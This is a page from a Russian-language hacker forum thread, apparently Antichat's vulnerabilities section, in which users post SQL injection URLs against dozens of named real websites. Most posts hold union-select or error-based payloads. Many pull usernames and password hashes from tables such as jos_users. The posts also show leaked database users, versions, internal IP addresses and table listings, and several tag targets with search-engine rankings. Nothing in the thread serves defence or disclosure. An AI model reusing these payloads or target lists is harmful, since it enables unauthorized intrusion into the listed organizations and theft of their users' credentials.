ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12031  
Старый 03.05.2010, 19:39
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

орги


http://www.hmsu.org/showgig.php?gigid=-178+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9+from+HMSUAuth--

user(): root@localhost
version(): 5.1.22-rc-log
database(): hmsu
OS: portbld-freebsd7.0
--------------------------------------------------------------------
http://www.globalcanopy.org/main.php?m=117&sm=-176+union+select+1,2,3,4,5,6

user(): globalcanopy@localhost
version(): 5.0.27
database(): globalcanopy
OS: шапочка
--------------------------------------------------------------------
http://www.mielomabrasil.org/news2.php?id_not=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16--

user(): myeloma@187.45.193.218
version(): 4.1.22-locaweb-log
database(): myeloma
OS: pc-linux-gnu
--------------------------------------------------------------------
http://www.archivalencia.org/contenido.php?a=5&modulo=71&pad=5&cat=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

user(): usrarchi3871@localhost
version(): 5.0.45-community-nt
database(): db_archidiocesis
OS: Windows
--------------------------------------------------------------------
http://www.cartadelapaz.org/portal_cp/ahumor_detall.php?id=-294+union+select+1,2,(user_name,char(58),user_pass word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ agora.phpbb_users--

user(): cartapaz@web.pangea.lan
version(): 5.0.51a-24+lenny
database(): cartapaz
OS: Debian
--------------------------------------------------------------------
http://www.chantez-online.org/chant.php?ID=-833+union+select+1,2--

user(): chantezonline@10.0.45.57
version(): 5.0.90-log
database(): chantezonline
OS: pc-linux-gnu
 
Ответить с цитированием

  #12032  
Старый 03.05.2010, 23:51
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.wanlebanon2010.com - PR 6

Код:
http://www.wanlebanon2010.com/articles.php?id=-2+union+select+1,version(),3,4,5,6,7--
Database Version: 5.0.51a-24+lenny3-log
Database name: lebanon2010
User name: lebanon@localhost


-----------------------------------------------------------------------------------------------------------

http://www.psy.ohio-state.edu - PR 6

Код:
http://www.psy.ohio-state.edu/php/FullEvent.php?id=63+union+select+1,2,3,4,5,6,version(),8,9--
Database Version: 5.0.77
Database name: department
User name: soyung@localhost


-----------------------------------------------------------------------------------------------------------

http://www.genomics.cn - PR 6

Код:
http://www.genomics.cn/en/edu.php?id=-201+union+select+version(),2,3,4,5--
Database Version: 5.0.77-log
Database name: newbgi
User name: www@192.168.8.5

Последний раз редактировалось Skofield; 04.05.2010 в 01:53..
 
Ответить с цитированием

  #12033  
Старый 04.05.2010, 12:13
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://202.120.108.10/depart/index.php?mod=Default&act=Xy&id=-7+union+select+1,2,concat(user(),version,database( ),@@version_compile_os),4,5,6
 
Ответить с цитированием

  #12034  
Старый 04.05.2010, 14:20
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Код:
http://tatural.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+

http://kookdookoo.com/punjabi/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+

http://poltavo.com/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+

http://www.baltisk.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+

http://www.home.zemliaky.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6,7+from+jos_users+--+

http://ofaqim.info/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,id,username,password))),3,4,5,6,7+from+jos_users+--+

http://i-de.org.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+

http://snt-tvoydom.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+

http://www.ruworld.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+

http://www.newradio.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+

http://mozhga18.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+

http://www.g-news.com.ua/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,password))),3,4,5,6,7+from+jos_users+--+

http://www.iaaf12.com/wap/wapmain.php?option=onews&action=link&id=-1+union+select+1,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+cms_users

http://vig.bstu.by/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+jos_users+-0-+

http://www.dpack.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+jos_users+--+

http://crd-institute.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,password,username,5,6,7,8+from+crd_users+--+

http://sams.perm.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8+from+jos_users+--+&Itemid=92

http://www.foxcom.ru/jml/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jos_users--

http://miacom.kz/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jos_users--

http://www.misiabela.pl/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7+from+jos_users+--+&Itemid=92

http://www.wegp.net/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7+from+jos_users+--+&Itemid=92

Последний раз редактировалось .:[melkiy]:.; 04.05.2010 в 14:31..
 
Ответить с цитированием

  #12035  
Старый 04.05.2010, 14:28
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.mentalwear.fi/web/index.php?id=41&shop_show_product=1&tuote_id=-73+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--

user(): mentalwearfi@10.1.0.15
version(): 5.0.45-log
database(): mentalwearfired
os: шапочка
 
Ответить с цитированием

  #12036  
Старый 04.05.2010, 15:36
Аватар для p@pillon
p@pillon
Новичок
Регистрация: 03.05.2010
Сообщений: 4
Провел на форуме:
71594

Репутация: 4
По умолчанию

Pr 4

http://www.plusbellelavie.org/news2.php?id=-1/**/union/**/all/**/select/**/1,user(),3,database(),5,6,7,8,9,10,11


http://www2.candw.lc/Media/news2.php?ID=-1/**/union/**/all/**/select/**/1,user(),version(),4,5,6,7,8--


user(): cwslu@localhost
version(): 4.0.18-nt



http://62.149.36.239/~pamco/news2.php?id=-1/**/union/**/all/**/select/**/1,2,user(),4,version(),6,7--


user(): pamco_pamco2@localhos
version(): 4.1.22-standard

Последний раз редактировалось p@pillon; 04.05.2010 в 15:42..
 
Ответить с цитированием

  #12037  
Старый 04.05.2010, 18:56
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.sasymphony.org
ТИЦ: 10
PR: 5
Пример запроса:
Код:
http://www.sasymphony.org/index3.php?eventIdD=-25+union+select+1,now(),3,4,5,concat_ws(0x0b,database(),user(),version(),@@version_compile_os),7,8,9,group_concat(0x0b,table_name),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+information_schema.tables--+
version - 5.0.90-community
user - sasympho@localhost
database - sasympho_symphonysite
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
categories,   
domains,   
keywords,   
link_keyword0,   
link_keyword1,   
link_keyword2,   
link_keyword3,   
link_keyword4,   
link_keyword5,   
link_keyword6,   
link_keyword7,   
link_keyword8,   
link_keyword9,   
link_keyworda,   
link_keywordb,   
link_keywordc,   
link_keywordd,   
link_keyworde,   
link_keywordf,   
links,   pending,   
query_log,   
site_category,   
sites,   
temp,   
0506season,   
0607season,   
0708season,   
0708ypc_scholar,   
0708ypc_tix,   
0809season,   
0809ypc_scholar,   
0809ypc_tix,   
0910season,   
0910ypc_scholar,   
0910ypc_tix,   
1011season,   
Classical_seatingPrice,   
PopsSpec_seatingPrice,   
Pops_seatingPrice,   
PressRelease,   
Renewals,   
band_email,   
brd_directors,   
cd_order_07,   
cd_order_08,   
cd_order_09,   
cd_orders,   
concert_series,   
concert_series_detail,   
concert_series_price_c,   
concert_series_price_p,   
donation_proc,   
email_blast,
columns:


Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
QUERY_ID,   
SEQ,   
STATE,   
DURATION,   
CPU_USER,   
CPU_SYSTEM,   
CONTEXT_VOLUNTARY,   
CONTEXT_INVOLUNTARY,   
BLOCK_OPS_IN,   
BLOCK_OPS_OUT,   
MESSAGES_SENT,   
MESSAGES_RECEIVED,   
PAGE_FAULTS_MAJOR,   
PAGE_FAULTS_MINOR,   
SWAPS,   
SOURCE_FUNCTION,   
SOURCE_FILE,  
SO
===================================

Сайт: http://www.franziskaner-minoriten.de
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.franziskaner-minoriten.de/index3.php?id=130+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+
user - db_minoriten@localhost
version - 5.0.45
database - db_minoriten
os - redhat-linux-gnu


===================================

Сайт: http://www.enpi-info.eu
ТИЦ: 20
PR: 7
Пример запроса:
Код:
http://www.enpi-info.eu/main.php?id=344&id_type=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(user(),+1,+63),+floor(rand(0)*2)))--+
user - enpid@localhost
version - 5.0.45
database - enpidef
os - redhat-linux-gnu

Последний раз редактировалось aka_zver; 06.05.2010 в 17:31..
 
Ответить с цитированием

  #12038  
Старый 04.05.2010, 21:08
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.bosnia.ba/razglednice/index.php?dk=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),database(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39+--
 
Ответить с цитированием

  #12039  
Старый 04.05.2010, 21:11
Аватар для Greaves
Greaves
Новичок
Регистрация: 07.04.2007
Сообщений: 29
Провел на форуме:
457999

Репутация: -8
По умолчанию

http://www.music-key.ru/shop.php?uid=-3071+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0--

http://www.persons-journal.com/index.php?context=submenu2&id=271%20union%20select %20group_concat%28table_name%29%20from%20informati on_schema.tables%20limit%201,1/*&pid=265&s=188
 
Ответить с цитированием

  #12040  
Старый 04.05.2010, 22:31
Аватар для KENT1994
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Цитата:
casgroup.fiu.edu/lacc/pages.php?id=719UNION ALL SELECT 1,%String_Col%,3,4,5,6,7--
Host IP: 131.94.74.225
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.1.6
DB Server: MySQL >=4.1
Current DB: cas

Цитата:
www.rhinossoccer.com/pages.php?id=23UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11--
Host IP: 69.163.245.54
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: rhinossoccer

Yandex ТИЦ 10
Google PageRank 5
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ